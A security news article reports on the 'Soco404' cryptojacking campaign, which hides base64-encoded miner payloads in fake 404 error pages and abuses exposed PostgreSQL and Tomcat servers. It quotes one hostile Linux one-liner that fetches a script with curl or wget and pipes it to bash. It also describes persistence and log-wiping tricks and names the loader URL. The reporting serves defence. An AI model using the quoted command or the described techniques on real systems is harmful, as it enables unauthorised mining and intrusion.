Beware of Fake Error Pages That Linux and Windows Systems With Platform-Specific Malware

A new wave of cryptojacking attacks is exploiting the humble 404 error page to sneak malicious binaries past defenders Dubbed “Soco404,” the campaign embeds base64-encoded payloads inside seemingly innocuous error screens hosted on Google Sites and compromised Tomcat servers, then detonates them on both Linux and Windows hosts.

Because the malicious content is tucked between normal HTML tags, traditional URL filtering and static scanners often miss the threat until CPU cycles mysteriously disappear.

The operation first surfaced in mid-2025, but investigators believe it is an evolution of earlier miner bots that preyed on weak Tomcat credentials and unpatched Atlassian Confluence instances.

Wiz.io researchers identified the latest variant while monitoring anomalous shell activity emanating from publicly exposed PostgreSQL databases, a service that nearly one-third of cloud tenants leave open to the internet.

Once inside, the attackers weaponize PostgreSQL’s COPY FROM PROGRAM feature to run arbitrary commands, pivoting laterally across mixed-OS estates and spinning up fresh miners at scale.

Beyond misconfigured databases, the adversary abuses already-owned web servers to masquerade as trusted infrastructure. Compromised Korean transportation sites deliver Linux droppers (soco.sh) and Windows loaders (ok.exe) that immediately erase themselves to hamper forensics.

Each branch of the malware family disguises itself as legitimate processes—sd-pam, kworker/R-rcu_p, or random eight-character Windows services—while scheduling cron jobs and shell-init hooks or disabling Windows Event Log to persist undetected.

Corporate dashboards register nothing more than a gradual rise in power bills and a dip in performance.

Infection via HTML-Smuggled 404 Pages

The heart of Soco404’s delivery chain is a loader that fetches a fake error page from https://www.fastsoco.top/1.

Hidden between the custom markers exe101 and exe101 lies a base64 blob that the loader decodes directly into memory, bypassing disk-based scanners.

On Linux, the initial command resembles the one-liner below:-

sh -c "(curl http://:8080/soco.sh||wget -q -O- http://:8080/soco.sh)|bash"

The script generates a random filename, kills competing miners, wipes /var/log/wtmp, and, if running as root, enables hugepages and tweaks model-specific registers for Ryzen or Intel CPUs to squeeze every hash from the silicon.

A Go-lang stub then re-executes itself as cpuhp/1, phones home to the 404 host, and launches an XMRig worker against pools c3pool and moneroocean using wallet 8BmVXb…eyZ.

Windows hosts follow a parallel path: certutil, Invoke-WebRequest, or curl drops ok.exe into C:UsersPublic, spawns conhost.exe, injects the main miner, and silently deletes the original file after a three-second choice delay.

Both branches chatter over local sockets for resilience and keep watchdog threads ready to respawn if killed, ensuring the fake error page keeps harvesting coins long after the 404 message fades from view.

Experience faster, more accurate phishing detection and enhanced protection for your business with real-time sandbox analysis-> Try ANY.RUN now